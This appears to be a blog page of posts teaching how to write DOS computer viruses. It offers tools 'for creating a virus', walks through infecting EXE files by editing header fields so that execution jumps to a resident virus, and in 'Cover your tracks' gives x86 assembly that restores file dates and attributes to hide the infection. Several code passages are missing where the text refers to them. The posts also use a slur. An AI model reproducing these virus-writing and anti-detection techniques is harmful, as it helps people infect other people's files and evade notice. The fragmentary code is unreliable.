Free Disassembler For You!!

As for the last post, I've already giving you the free assembler for your "project", and now I'll give you free disassembler for you to have an "experiment", note that I said EXPERIMENT(LOL), on assembly language or disassemble a complete project.
Posted by --;(@ at 11:30 PM 1 comments

Turbo Assembler Free Download For You!

For so long I always give you tips and tutorial for creating a virus but I never give you a tools to create them. I think now is the time to give you my fellow readers a freebies.

Download free Turbo Assembler here. Thank you for being with me. :D


Reblog this post [with Zemanta]
Posted by --;(@ at 1:17 PM 1 comments Labels: , , ,

EXE Infections: Part 1 "Infection Process" Cont'

First thing to do is read the EXE header for the file to be infected! That can be resolved by...
Next, after reading the first 28 bytes, you will need to set your file pointers to the end of the file.

After bringing your virus to the end, you may start the infection process
;Remember BX = File Handle DX:AX Pointer Location (EOF)

The following finds new CS:IP and SS:SP registers. It will create a new segment, and CS:IP will point to the beginning of the Virus. If you have other code, and the virus beginning is further down the First byte, just add the number of Bytes to AX.
Now we are Ready to write the virus to the EXE File! (Yeah!)

This code works 100% as is! (Resident Virus) For Non-Residents add a location pointer! Besides, Why the Hell are you write a non-Ressy Virus? You Gay? LOL!!~

Stay RESIDENT in my site OKAY!!!~
Reblog this post [with Zemanta]
Posted by --;(@ at 8:40 PM 1 comments Labels: , ,

EXE Infections: Part 1 "Infection Process"

AIDS (computer virus)Image via Wikipedia

We must admit there are HUGE amount of Lame Viruses out there. Ever wonder why so many people talk about the AIDS virus? Its a fucken over writing virus. Its HUGE in size and its written in PASCAL. Please! Have a little more respect for the virus world. What happened to that old Bulgarian Spirit? That too has died. Bulgaria isn't writing as many top viruses as it used to! Or are we in for a surprise? (USSR Kicks!)



Well to help people in advancing their Virus programming ability I will try to explain that basics in Infecting an EXE file. There are several ways to infect an EXE file. And I have tried several types. The best one I have programmed is the one you'll see. In Basic, it will infect EXEs by starting a new segment, only for the virus. This will infect EXEs over the size of 64k, and it is a lot less complicated..


Before we can begin we must know a few things, about EXEs. Let's say a .COM file has been loaded to segment address 1234:0000. When the COM file runs its code is limited to 1234:0000 to 1234:FFFF (64k). In the other end EXE files, are basicaly several COMs in one. Where EXE files can set up DATA struct in one segment, CODE in another, and STACK in another. EXEs can have an unlimited amount of Segments, its limitation is Memory Availablity. And the EXE file keeps track of these Segments, with an EXE header, telling DOS what segments start where, How big the file is, the amount of memory needed to run. the EXE header is the first few bytesof the EXE file.


Though if you use DEBUG to load an EXE file you will not run into the EXE header, as DEBUG uses the EXE header to load its CS:IP registers with, the SS:SP and so on. Though you can view the EXE header with debug if you Rename that EXE file. So just do `DEBUG FILENAME.EXE' Just rename an EXE, the extension can be anything you wish, however don't go and rename it to COM or BIN, these are reserved Extensions, and debug treats them differently, Example if you rename it to COM debug will load the IP regester as 0100h. The EXE header is Usually 28 bytes, though it is save as 32 Bytes Long. As the size of the EXE header (Offset 8) is in multiple 16 bytes, so 28 bytes will have to be covered in (16*2)! But the last 4 bytes are unused, by dos, Though Doesn't STOP a VIRUS from using it? Just a poping ideas out in the open. Anyhow this is how the EXE header consists, of..


START OFFSETS DISCRIPTIONS

(hex) (dec)

00 | 00 | Always 4D 5A. Marks this file as an .EXE file

*02 | 02 | Remainder after dividing load module's size by 512

*04 | 04 | Size of file in 512 byte pages

06 | 06 | Number of relocation table entries

@08 | 08 | Size of header in paragraphs (16 bytes)

0A | 10 | Minumum number of paragraphs required after loaded program

0C | 12 | Maximum number of paragraphs required after loaded program

*0E | 14 | (SS) Offset of Stack Segment in Load module in paragraphs

*10 | 16 | SP regester loaded with this word

12 | 18 | Negative sum (ignore overflow) of all words in file (CRC)

*14 | 20 | IP register loaded with this word

*16 | 22 | (CS) Offset of Code Segment in load module in paragraphs

18 | 24 | Offset of first relocation item.

1A | 26 | Overlay number. If no overlays used, this is 0

* = Will be Edited by our Virus

@ = Needed to help our reconstruction of the EXE header

Reblog this post [with Zemanta]
Posted by --;(@ at 12:15 AM 0 comments Labels: , ,

Cover your tracks

This step, though simple to do, is too easily neglected. It is extremely important, as a wary user will be alerted to the presence of a virus by any unnecessary updates to a file. In its simplest form, it involves the restoration of file attributes, time and date. This is done with the following:

mov ax, 5701h ; Set file time/date

mov dx, word ptr [bp+f_date] ; DX = date

mov cx, word ptr [bp+f_time] ; CX = time

int 21h

mov ah, 3eh ; Handle close file

int 21h

mov ax, 4301h ; Set attributes

lea dx, [bp+offset DTA + 1Eh] ; Filename still in DTA

xor ch, ch

mov cl, byte ptr [bp+f_attrib] ; Attribute in CX

int 21h

Remember also to restore the directory back to the original one if it changed during the run of the virus.

Posted by --;(@ at 1:32 PM 0 comments
Subscribe to: Posts (Atom)